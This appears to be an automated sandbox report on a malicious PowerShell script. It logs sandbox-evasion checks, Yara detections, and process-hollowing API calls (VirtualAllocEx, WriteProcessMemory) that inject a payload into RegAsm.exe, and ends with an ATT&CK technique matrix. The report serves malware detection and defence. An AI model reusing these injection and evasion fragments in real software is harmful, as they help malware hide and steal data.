                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3ef2e0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3d84acbf0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3d84a6ca4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3d70f5c70.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3d70f0684.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3d84a6ca4.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3d70f0684.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3d84b35b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2236665088.000002C3EF2E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2206077558.000002C3D70F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2206077558.000002C3D84A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
                      Source: RegAsm.exe, 00000003.00000002.2218088489.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE`,
                      Source: RegAsm.exe, 00000003.00000002.2218088489.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                      Source: RegAsm.exe, 00000003.00000002.2218088489.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4961Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4931Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4176Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: RegAsm.exe, 00000003.00000002.2218088489.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                      Source: RegAsm.exe, 00000003.00000002.2218088489.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe`,
                      Source: svchost.exe, 00000005.00000002.3412414217.0000021AB1C41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3412447260.0000021AB1C54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3411465347.0000021AAC62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: RegAsm.exe, 00000003.00000002.2218088489.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\
                      Source: powershell.exe, 00000000.00000002.2235685350.000002C3EEF98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: 0.2.powershell.exe.2c3d84b35b0.4.raw.unpack, Hollows.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                      Source: 0.2.powershell.exe.2c3d84b35b0.4.raw.unpack, Hollows.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                      Source: 0.2.powershell.exe.2c3d84b35b0.4.raw.unpack, Hollows.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                      Source: 0.2.powershell.exe.2c3d84b35b0.4.raw.unpack, Hollows.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
                      Source: 0.2.powershell.exe.2c3d84b35b0.4.raw.unpack, Hollows.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4AA000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 4AC000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1107008Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: RegAsm.exe, 00000003.00000002.2218088489.0000000003407000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                      Source: RegAsm.exe, 00000003.00000002.2218088489.0000000003407000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3e6fc8f00.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3e6fc8f00.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2213531087.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2229665328.000002C3E6FA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2229665328.000002C3E6D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1952, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3e6fc8f00.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3e6fc8f00.7.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3e6fc8f00.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3e6fc8f00.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2213531087.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2229665328.000002C3E6FA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2229665328.000002C3E6D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1952, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3e6fc8f00.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.2c3e6fc8f00.7.raw.unpack, type: UNPACKEDPE
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      212
                      Process Injection
                      11
                      Masquerading
                      11
                      Input Capture
                      111
                      Security Software Discovery
                      Remote Services11
                      Input Capture
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory2
                      Process Discovery
                      Remote Desktop Protocol1
                      Archive Collected Data
                      11
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture11
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets2
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials22
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      TST.ps118%ReversingLabsWin32.Trojan.Generic
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
